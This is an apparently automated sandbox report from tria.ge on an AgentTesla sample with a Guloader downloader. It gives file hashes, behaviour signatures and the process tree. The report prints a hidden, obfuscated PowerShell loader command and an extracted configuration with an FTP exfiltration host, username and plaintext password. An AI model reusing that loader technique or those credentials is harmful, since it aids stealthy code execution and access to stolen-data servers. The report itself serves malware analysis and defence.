Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    140s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20231201-en
  • resource tags

    arch:x64arch:x86image:win7-20231201-enlocale:en-usos:windows7-x64system
  • submitted
    08/12/2023, 02:19

General

  • Target

    ea973e9c6f622a479e04107580a0ede92211fbd94b582d843e166fdc2d85dd05.exe

  • Size

    682KB

  • MD5

    55f2d796aae312c3ef0589c215749470

  • SHA1

    151d39760a5318f483ccdcc9829fad5ac8afab52

  • SHA256

    ea973e9c6f622a479e04107580a0ede92211fbd94b582d843e166fdc2d85dd05

  • SHA512

    e2e2d4699056203dcd2af6150e18727c6e54d3405504c5b5964a1f2f1f53c139d143d138395beede01886ab1a45e00fb72a65ae4e9238bf158289270767c3df8

  • SSDEEP

    12288:GwFGHEnT8VJWMB5VmjFvK4Nk35wxcCMjHaylgimtdYM3O0V7bb:G5HEgVJj8jg4k5jCMjhlgZtub0V7

Malware Config

Extracted

Family

agenttesla

Credentials

  • Protocol:
    ftp
  • Host:
    ftp://ftp.vvspijkenisse.nl
  • Port:
    21
  • Username:
    [email protected]
  • Password:
    playingboyz231

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ea973e9c6f622a479e04107580a0ede92211fbd94b582d843e166fdc2d85dd05.exe
    "C:\Users\Admin\AppData\Local\Temp\ea973e9c6f622a479e04107580a0ede92211fbd94b582d843e166fdc2d85dd05.exe"
    1⤵
    • Drops file in System32 directory
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:2000
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle hidden "$Induktion=Get-Content 'C:\Users\Admin\AppData\Roaming\gregerss\dagbger\Sideordnes\Mellilita.Flu';$Evaporeringen139=$Induktion.SubString(50194,3);.$Evaporeringen139($Induktion)"
      2⤵
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1632
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
        3⤵
        • Suspicious use of NtCreateThreadExHideFromDebugger
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2228

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\Rkkens.ini

    Filesize

    32B

    MD5

    a8ca1db6ae34f5e5c152094f44f92476

    SHA1

    9fe0fd4e6907c4f9099d2533c3bade4ffa0968e7

    SHA256

    1f0dbc97d6570f2f5a1e18f82842c9a0007e568ca8fb768c123637ef5077aad3

    SHA512

    e48e987e1f8297b17f7fb5b8b34da6131156834310987600b20b0dcff4c43632ccb4b2305030a4a999f783176d480c8300e6aef92afbb2032379eca6dac88b5a

  • C:\Users\Admin\AppData\Roaming\gregerss\dagbger\Sideordnes\Kvababbelsers.Bum

    Filesize

    272KB

    MD5

    07680313c03d4287ff1b4976923d41f5

    SHA1

    01b440609e243762c5f8fefb97a73625e5ba2d4d

    SHA256

    a0a14bede619d41b689f53f9fad93517f0524167d23c246488d825cb18596c2f

    SHA512

    2bc17abbeee9d106e08302ba542e5e51b30664f5419c12b0d6551355fd72f26bf063771e7f9d9f92eda2349db026ee0362fcfba7f61e5a5ce985e06d429b9569

  • C:\Users\Admin\AppData\Roaming\gregerss\dagbger\Sideordnes\Mellilita.Flu

    Filesize

    49KB

    MD5

    4f519227d8762ab4a41ce7b824a05c7d

    SHA1

    5bec609db12c8880186abafc97eb21cad74e8366

    SHA256

    6e1b981cbce77169cfb154d3ad563a41bc9d7afa552798380bfc1133d72a0e88

    SHA512

    7a497b096b08521566628c56c98712ab204e40db73a255b9aee993bbf23dd799894d3929b8c0decb76c7ee679d9c4698ad6ffffe77ff6715bd586f1582a93bdd

  • memory/1632-174-0x0000000077B80000-0x0000000077D29000-memory.dmp

    Filesize

    1.7MB

  • memory/1632-176-0x0000000074400000-0x00000000749AB000-memory.dmp

    Filesize

    5.7MB

  • memory/1632-165-0x0000000074400000-0x00000000749AB000-memory.dmp

    Filesize

    5.7MB

  • memory/1632-166-0x0000000002930000-0x0000000002970000-memory.dmp

    Filesize

    256KB

  • memory/1632-171-0x00000000029F0000-0x00000000029F4000-memory.dmp

    Filesize

    16KB

  • memory/1632-172-0x0000000006760000-0x0000000007952000-memory.dmp

    Filesize

    17.9MB

  • memory/1632-173-0x0000000006760000-0x0000000007952000-memory.dmp

    Filesize

    17.9MB

  • memory/1632-164-0x0000000074400000-0x00000000749AB000-memory.dmp

    Filesize

    5.7MB

  • memory/1632-175-0x0000000077D70000-0x0000000077E46000-memory.dmp

    Filesize

    856KB

  • memory/1632-167-0x0000000002930000-0x0000000002970000-memory.dmp

    Filesize

    256KB

  • memory/1632-182-0x0000000006760000-0x0000000007952000-memory.dmp

    Filesize

    17.9MB

  • memory/1632-178-0x0000000002930000-0x0000000002970000-memory.dmp

    Filesize

    256KB

  • memory/2228-179-0x0000000077B80000-0x0000000077D29000-memory.dmp

    Filesize

    1.7MB

  • memory/2228-180-0x000000006FF00000-0x0000000070F62000-memory.dmp

    Filesize

    16.4MB

  • memory/2228-181-0x0000000000FE0000-0x00000000021D2000-memory.dmp

    Filesize

    17.9MB

  • memory/2228-177-0x0000000000FE0000-0x00000000021D2000-memory.dmp

    Filesize

    17.9MB

  • memory/2228-183-0x000000006FF00000-0x000000006FF40000-memory.dmp

    Filesize

    256KB

  • memory/2228-184-0x000000006F810000-0x000000006FEFE000-memory.dmp

    Filesize

    6.9MB

  • memory/2228-186-0x0000000000FE0000-0x00000000021D2000-memory.dmp

    Filesize

    17.9MB

  • memory/2228-188-0x000000006F810000-0x000000006FEFE000-memory.dmp

    Filesize

    6.9MB